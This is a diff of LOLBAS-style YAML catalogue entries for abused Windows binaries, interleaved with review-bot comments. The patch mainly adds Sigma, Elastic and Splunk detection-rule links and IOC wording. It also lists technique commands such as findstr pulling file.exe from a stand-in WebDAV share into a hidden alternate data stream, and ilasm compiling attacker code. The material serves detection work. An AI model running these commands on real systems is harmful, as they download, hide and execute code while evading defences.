- Splunk: https://github.com/splunk/security_content/blob/552b67da9452fb0765e3624b3d6e3ef6c0508bda/detections/endpoint/dllhost_with_no_command_line_arguments_with_network.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_dllhost_no_command_line_arguments.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/c457614e37bf7b6db02de84c7fa71a5620783236/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml
|
||||||
|
- IOC: DotNet CLR libraries loaded into dllhost.exe
|
||||||
|
- IOC: DotNet CLR Usage Log - dllhost.exe.log
|
||||||
|
- IOC: Suspicious network connectings originating from dllhost.exe
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/CyberRaiju/status/1167415118847598594
|
- Link: https://twitter.com/CyberRaiju/status/1167415118847598594
|
||||||
- Link: https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08
|
- Link: https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08
|
||||||
|
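Review bot: typo in the added IOC: `Suspicious network connectings originating from dllhost.exe` should read `connections`. Both Splunk rules in this hunk concern dllhost.exe running with no command-line arguments, which is the actual indicator (a legitimate COM surrogate carries `/Processid:{...}`); none of the IOC lines mention the empty command line the rules key on, so add one.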
@ -17,7 +17,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Dnscmd.exe loading dll from UNC path
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
|
||||||
|
- IOC: Dnscmd.exe loading dll from UNC/arbitrary path
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
|
- Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
|
||||||
- Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
|
- Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
|
||||||
|
@ -52,7 +52,12 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/egre55/status/985994639202283520
|
- Link: https://twitter.com/egre55/status/985994639202283520
|
||||||
- Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
|
- Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
|
||||||
|
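Review bot: the first two Sigma links point into `rules/windows/deprecated/` (`win_susp_vssadmin_ntds_activity.yml`, `win_susp_esentutl_activity.yml`); pinned URLs keep resolving, but readers should not be sent to deprecated rules without being told, and `process_susp_esentutl_params.yml` in the same hunk looks like the live replacement. Either drop the deprecated pair or annotate them. The empty `- IOC:` is removed and no IOC is added; one describing esentutl copying locked files (SAM, NTDS.dit, as the `esentutl_sam_copy.yml` and `copy_ntds_sam_volshadowcp_cmdline.toml` links imply) would fill that gap.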
@ -17,6 +17,10 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
|
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml
|
||||||
- IOC: eventvwr.exe launching child process other than mmc.exe
|
- IOC: eventvwr.exe launching child process other than mmc.exe
|
||||||
- IOC: Creation or modification of the registry value HKCU\Software\Classes\mscfile\shell\open\command
|
- IOC: Creation or modification of the registry value HKCU\Software\Classes\mscfile\shell\open\command
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -31,7 +31,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/infosecn1nja/status/986628482858807297
|
- Link: https://twitter.com/infosecn1nja/status/986628482858807297
|
||||||
- Link: https://twitter.com/Oddvarmoe/status/986709068759949319
|
- Link: https://twitter.com/Oddvarmoe/status/986709068759949319
|
||||||
|
@ -24,7 +24,10 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this.
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer_break_proctree.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml
|
||||||
|
- IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious.
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/CyberRaiju/status/1273597319322058752?s=20
|
- Link: https://twitter.com/CyberRaiju/status/1273597319322058752?s=20
|
||||||
- Link: https://twitter.com/bohops/status/1276356245541335048
|
- Link: https://twitter.com/bohops/status/1276356245541335048
|
||||||
|
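Review bot: `Multiple instances of explorer.exe ... is suspicious` is a weak IOC to state flatly: every interactive session runs its own explorer.exe, and the shell option to launch folder windows in a separate process also produces several. The `/root` argument is the discriminating part; lead with that and qualify the multiple-instances clue as "beyond the expected one per session", or analysts will tune the rule out.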
@ -38,7 +38,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
|
@ -4,15 +4,15 @@ Description:
|
|||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: 2018-05-25
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
- Command: findstr /V /L W3AllLov3LolBas c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
||||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||||
Usecase: Add a file to an alternate data stream to hide from defensive counter measures
|
Usecase: Add a file to an alternate data stream to hide from defensive counter measures
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1564.004
|
MitreID: T1564.004
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
|
- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
|
||||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||||
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
|
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
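Review bot: the Description of the second command (`Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.`) is identical to the first one's and does not say that the source file is read from `\\webdavserver\folder\file.exe`, although the Usecase does; while the string is being renamed, make the Description mention the WebDAV source. Style: the context line `OperatingSystem: Windows vista, ...` has a lowercase "vista" that could be corrected in the same pass.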
@ -25,8 +25,8 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1552.001
|
MitreID: T1552.001
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
|
- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe
|
||||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file.
|
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file.
|
||||||
Usecase: Download/Copy file from webdav server
|
Usecase: Download/Copy file from webdav server
|
||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
@ -38,7 +38,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: findstr.exe should normally not be invoked on a client system
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
|
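Review bot: the only human-readable indicator, `- IOC: findstr.exe should normally not be invoked on a client system`, is replaced by the Sigma link rather than supplemented by it, whereas the finger.exe and fltMC.exe hunks in this same patch keep their IOC lines next to the rule links. If the IOC was dropped on purpose because findstr is common in scripts and the statement was too broad, say so in the commit message; otherwise keep the IOC line under the Sigma entry.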
@ -15,6 +15,7 @@ Full_Path:
|
|||||||
- Path: c:\windows\system32\finger.exe
|
- Path: c:\windows\system32\finger.exe
|
||||||
- Path: c:\windows\syswow64\finger.exe
|
- Path: c:\windows\syswow64\finger.exe
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
|
||||||
- IOC: finger.exe should not be run on a normal workstation.
|
- IOC: finger.exe should not be run on a normal workstation.
|
||||||
- IOC: finger.exe connecting to external resources.
|
- IOC: finger.exe connecting to external resources.
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -16,6 +16,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/c27084dd0c432335fa4369e5002a61dfe0ab9c65/rules/windows/process_creation/win_sysmon_driver_unload.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_via_filter_manager.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/unload_sysmon_filter_driver.yml
|
||||||
- IOC: 4688 events with fltMC.exe
|
- IOC: 4688 events with fltMC.exe
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
|
- Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
|
||||||
|
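Review bot: the IOC `4688 events with fltMC.exe` is too broad to be actionable on its own, while all three added rules are specifically about unloading the Sysmon filter driver (`win_sysmon_driver_unload.yml`, `defense_evasion_via_filter_manager.toml`, `unload_sysmon_filter_driver.yml`). Suggest refining the IOC to process creation of fltMC.exe with an `unload` argument, especially when the target is the Sysmon driver, so the IOC matches what the linked rules actually detect.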
@ -24,7 +24,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/vector_sec/status/896049052642533376
|
- Link: https://twitter.com/vector_sec/status/896049052642533376
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
|
@ -24,6 +24,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml
|
||||||
- IOC: cmd /c as child process of ftp.exe
|
- IOC: cmd /c as child process of ftp.exe
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/0xAmit/status/1070063130636640256
|
- Link: https://twitter.com/0xAmit/status/1070063130636640256
|
||||||
|
@ -169,6 +169,7 @@ Full_Path:
|
|||||||
- Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
|
- Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
|
||||||
- Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
|
- Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_file_download_via_gfxdownloadwrapper.yml
|
||||||
- IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.
|
- IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://www.sothis.tech/author/jgalvez/
|
- Link: https://www.sothis.tech/author/jgalvez/
|
||||||
|
@ -24,7 +24,12 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: hh.exe should normally not be in use on a normal workstation
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_hh_chm.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_html_help_spawn.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
|
- Link: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
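Review bot: same issue as the findstr hunk: `- IOC: hh.exe should normally not be in use on a normal workstation` is removed in favour of rule links instead of being kept alongside them. The Sigma, Elastic and Splunk entries are useful, but a reader without those platforms loses the only plain indicator; keep the IOC line under the rule links.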
@ -13,6 +13,7 @@ Commands:
|
|||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
|
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
|
||||||
|
Detection:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/notwhickey/status/1367493406835040265
|
- Link: https://twitter.com/notwhickey/status/1367493406835040265
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
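Review bot: this hunk introduces a bare `Detection:` key with no list entries, which parses as null in YAML rather than as an empty sequence; if the site generator or a schema expects a list, this file will break. Either add at least one IOC for IMEWDBLD.exe or confirm the loader tolerates a null value. Note also that the commit message says empty `Detection:Sigma` entries are being removed while an empty Detection key is being added here.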
@ -19,7 +19,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: ie4uinit.exe loading a inf file from outside %windir%
|
- IOC: ie4uinit.exe copied outside of %windir%
|
||||||
|
- IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir%
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
|
- Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -24,7 +24,11 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
|
||||||
|
- IOC: Network connections originating from ieexec.exe may be suspicious
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
|
- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -5,14 +5,14 @@ Author: Hai vaknin (lux)
|
|||||||
Created: 2020-03-17
|
Created: 2020-03-17
|
||||||
Commands:
|
Commands:
|
||||||
- Command: ilasm.exe C:\public\test.txt /exe
|
- Command: ilasm.exe C:\public\test.txt /exe
|
||||||
Description: Binary file used by .NET to compile c# code to .exe
|
Description: Binary file used by .NET to compile C#/intermediate (IL) code to .exe
|
||||||
Usecase: Compile attacker code on system. Bypass defensive counter measures.
|
Usecase: Compile attacker code on system. Bypass defensive counter measures.
|
||||||
Category: Compile
|
Category: Compile
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
OperatingSystem: Windows 10,7
|
OperatingSystem: Windows 10,7
|
||||||
- Command: ilasm.exe C:\public\test.txt /dll
|
- Command: ilasm.exe C:\public\test.txt /dll
|
||||||
Description: Binary file used by .NET to compile c# code to dll
|
Description: Binary file used by .NET to compile C#/intermediate (IL) code to dll
|
||||||
Usecase: A description of the usecase
|
Usecase: A description of the usecase
|
||||||
Category: Compile
|
Category: Compile
|
||||||
Privileges: User
|
Privileges: User
|
||||||
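Review bot: the new Description `Binary file used by .NET to compile C#/intermediate (IL) code to .exe` is still inaccurate: ilasm.exe is the IL assembler, it takes IL (MSIL) assembly text and emits an executable or DLL, and it does not compile C# at all. Suggest `Binary file used by .NET to assemble IL (MSIL) code into an .exe` (and `... into a DLL` for the second command). The context line `Usecase: A description of the usecase` is also a leftover template placeholder that should be replaced while this file is being touched.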
@ -22,6 +22,8 @@ Full_Path:
|
|||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: Ilasm may not be used often in production environments (such as on endpoints)
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
|
- Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -17,10 +17,12 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/KyleHanslovan/status/911997635455852544
|
- Link: https://twitter.com/KyleHanslovan/status/911997635455852544
|
||||||
- Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
|
- Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
|
||||||
|
- Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Kyle Hanslovan
|
- Person: Kyle Hanslovan
|
||||||
Handle: '@kylehanslovan'
|
Handle: '@kylehanslovan'
|
||||||
|
@ -26,7 +26,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
|
- Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
|
||||||
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
|
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
|
||||||
|
@ -31,7 +31,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Makecab getting files from Internet
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
|
||||||
|
- IOC: Makecab retrieving files from Internet
|
||||||
- IOC: Makecab storing data into alternate data streams
|
- IOC: Makecab storing data into alternate data streams
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
|
@ -24,6 +24,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mavinject_proc_inj.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/c44b22b52fce406d45ddb6743a02b9ff8c62c7c6/rules/windows/process_creation/sysmon_creation_mavinject_dll.yml
|
||||||
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
|
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/gN3mes1s/status/941315826107510784
|
- Link: https://twitter.com/gN3mes1s/status/941315826107510784
|
||||||
|
@ -30,6 +30,12 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/win_workflow_compiler.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml
|
||||||
|
